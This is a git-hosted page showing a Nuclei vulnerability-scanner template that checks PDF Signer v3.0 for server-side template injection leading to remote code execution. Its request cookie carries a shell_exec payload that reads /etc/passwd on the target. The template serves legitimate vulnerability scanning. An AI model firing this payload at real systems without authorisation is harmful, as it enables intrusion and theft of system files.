daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/PDF Signer v3.0 - SSTI to R...

22 lines
481 B
YAML
Raw Blame History

id: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/"
headers:
- Cookie: CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
Reference in New Issue View Git Blame Copy Permalink